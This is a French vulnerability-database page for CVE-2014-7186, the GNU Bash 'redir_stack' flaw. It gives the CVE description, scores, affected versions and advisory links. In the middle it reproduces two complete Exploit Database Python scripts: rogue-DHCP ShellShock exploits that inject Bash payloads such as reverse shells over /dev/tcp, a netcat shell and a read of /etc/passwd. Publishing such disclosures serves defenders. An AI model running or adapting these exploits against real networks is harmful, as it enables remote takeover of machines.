CVE-2014-7186 : Détail

CVE-2014-7186

Overflow
97.37%V3
Network
2014-09-28
17h00 +00:00
2018-10-09
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 36933

Date de publication : 2014-09-28 22h00 +00:00
Auteur : fdiskyou
EDB Vérifié : Yes

#!/usr/bin/python # Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC # Date: 2014-09-29 # Author: @fdiskyou # e-mail: rui at deniable.org # Version: 4.1 # Tested on: Debian, Ubuntu, Kali # CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187 from scapy.all import * conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) victim_assign_ip = "10.0.1.100" server_ip = "10.0.1.2" gateway_ip = "10.0.1.2" subnet_mask = "255.255.255.0" dns_ip = "8.8.8.8" spoofed_mac = "00:50:56:c0:00:01" payload = "() { ignored;}; echo 'moo'" payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777" payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &" payload_4 = "() { ignored;}; /bin/cat /etc/passwd" payload_5 = "() { ignored;}; /usr/bin/wget http://google.com" rce = payload_5 def toMAC(strMac): cmList = strMac.split(":") hCMList = [] for iter1 in cmList: hCMList.append(int(iter1, 16)) hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5]) return hMAC def detect_dhcp(pkt): # print 'Process ', ls(pkt) if DHCP in pkt: # if DHCP Discover then DHCP Offer if pkt[DHCP].options[0][1]==1: clientMAC = pkt[Ether].src print "DHCP Discover packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid, sname=server_ip )/ DHCP(options=[('message-type','offer')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Offer packet sent" # if DHCP Request than DHCP ACK if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: clientMAC = pkt[Ether].src print "DHCP Request packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid )/ DHCP(options=[('message-type','ack')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Ack packet sent" def main(): #sniff DHCP requests sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1") if __name__ == '__main__': sys.exit(main())
Exploit Database EDB-ID : 34860

Date de publication : 2014-10-01 22h00 +00:00
Auteur : @0x00string
EDB Vérifié : No

#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnu.org # Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz # Version: 4.3.11 # Tested on: Ubuntu 14.04.1 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ______ ______ _ # / __ | / __ |/ __ | _ (_) #| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___ #| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___) #| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ | # \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/ # (_____| # _ _ _ _ # | | | | (_) _ # _ | | | _ ____| |_ ____ ____ | |_ # / || | || \ / ___) | |/ _ ) _ \| _) #( (_| | | | ( (___| | ( (/ /| | | | |__ # \____|_| |_|\____)_|_|\____)_| |_|\___) # # _ _ _ _ _ # | | | | | | | | | # ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____ # /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___) #|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | #(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_| # this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts # once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out # The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability. # can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example. import socket, struct def HexToByte( hexStr ): b = [] h = ''.join( h.split(" ") ) for i in range(0, len(h), 2): b.append( chr( int (h[i:i+2], 16 ) ) ) return ''.join( b ) rport = 68 lport = 67 bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bsock.bind(("<broadcast>", lport)) while True: OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114 URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex") URLLEN = chr(len(URL) / 2).encode("hex") END = "03040a000001ff" broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048) hexip = broadcast_get[245:249] rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3])) XID = broadcast_get[4:8].encode("hex") chaddr = broadcast_get[29:34].encode("hex") print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n" OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END OFFER_BYTES = HexToByte(OFFER) ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END ACK_BYTES = HexToByte(ACK) print "[+]\tsending evil offer\n" sock.sendto(OFFER_BYTES, (rhost, rport)) broadcast_get2 = bsock.recvfrom(2048) print "[+]\tassuming request was received, sending ACK\n" sock.sendto(ACK_BYTES, (rhost, rport))

Products Mentioned

Configuraton 0

Gnu>>Bash >> Version 1.14.0

Gnu>>Bash >> Version 1.14.1

Gnu>>Bash >> Version 1.14.2

Gnu>>Bash >> Version 1.14.3

Gnu>>Bash >> Version 1.14.4

Gnu>>Bash >> Version 1.14.5

Gnu>>Bash >> Version 1.14.6

Gnu>>Bash >> Version 1.14.7

Gnu>>Bash >> Version 2.0

Gnu>>Bash >> Version 2.01

Gnu>>Bash >> Version 2.01.1

Gnu>>Bash >> Version 2.02

Gnu>>Bash >> Version 2.02.1

Gnu>>Bash >> Version 2.03

Gnu>>Bash >> Version 2.04

Gnu>>Bash >> Version 2.05

Gnu>>Bash >> Version 2.05

Gnu>>Bash >> Version 2.05

Gnu>>Bash >> Version 3.0

Gnu>>Bash >> Version 3.0.16

Gnu>>Bash >> Version 3.1

Gnu>>Bash >> Version 3.2

Gnu>>Bash >> Version 3.2.48

Gnu>>Bash >> Version 4.0

Gnu>>Bash >> Version 4.0

Gnu>>Bash >> Version 4.1

Gnu>>Bash >> Version 4.2

Gnu>>Bash >> Version 4.3

Références

http://marc.info/?l=bugtraq&m=141577137423233&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=141383138121313&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=142721162228379&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=142358026505815&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61188
Tags : third-party-advisory, x_refsource_SECUNIA
http://jvn.jp/en/jp/JVN55667175/index.html
Tags : third-party-advisory, x_refsource_JVN
http://secunia.com/advisories/60433
Tags : third-party-advisory, x_refsource_SECUNIA
http://openwall.com/lists/oss-security/2014/09/25/32
Tags : mailing-list, x_refsource_MLIST
http://marc.info/?l=bugtraq&m=141383026420882&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=141585637922673&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=141576728022234&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61636
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61816
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61442
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=142358078406056&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61283
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=142113462216480&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61654
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/62312
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=141879528318582&w=2
Tags : vendor-advisory, x_refsource_HP
http://rhn.redhat.com/errata/RHSA-2014-1312.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=142118135300698&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61703
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/USN-2364-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/61065
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=141383196021590&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=141383081521087&w=2
Tags : vendor-advisory, x_refsource_HP
http://jvndb.jvn.jp/jvndb/JVNDB-2014-000126
Tags : third-party-advisory, x_refsource_JVNDB
http://marc.info/?l=bugtraq&m=141879528318582&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61641
Tags : third-party-advisory, x_refsource_SECUNIA
http://seclists.org/fulldisclosure/2014/Oct/0
Tags : mailing-list, x_refsource_FULLDISC
http://www.mandriva.com/security/advisories?name=MDVSA-2015:164
Tags : vendor-advisory, x_refsource_MANDRIVA
https://support.apple.com/HT205267
Tags : x_refsource_CONFIRM
http://marc.info/?l=bugtraq&m=142721162228379&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/60024
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61622
Tags : third-party-advisory, x_refsource_SECUNIA
http://openwall.com/lists/oss-security/2014/09/28/10
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/62343
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61565
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/HT204244
Tags : x_refsource_CONFIRM
http://marc.info/?l=bugtraq&m=141450491804793&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61313
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=142289270617409&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=142358026505815&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61873
Tags : third-party-advisory, x_refsource_SECUNIA
http://openwall.com/lists/oss-security/2014/09/26/2
Tags : mailing-list, x_refsource_MLIST
http://secunia.com/advisories/61485
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61618
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=141577297623641&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=141383244821813&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61312
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/60193
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61479
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/60063
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/60034
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/59907
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/58200
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=141577241923505&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61643
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61503
Tags : third-party-advisory, x_refsource_SECUNIA
http://rhn.redhat.com/errata/RHSA-2014-1354.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=142289270617409&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=141694386919794&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61552
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61780
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/62228
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=141330468527613&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/60044
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61291
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=141345648114150&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61287
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=142118135300698&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=142118135300698&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/61711
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=142113462216480&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=141383304022067&w=2
Tags : vendor-advisory, x_refsource_HP
http://rhn.redhat.com/errata/RHSA-2014-1311.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/61128
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61471
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/60055
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61550
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61633
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61328
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61129
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/61603
Tags : third-party-advisory, x_refsource_SECUNIA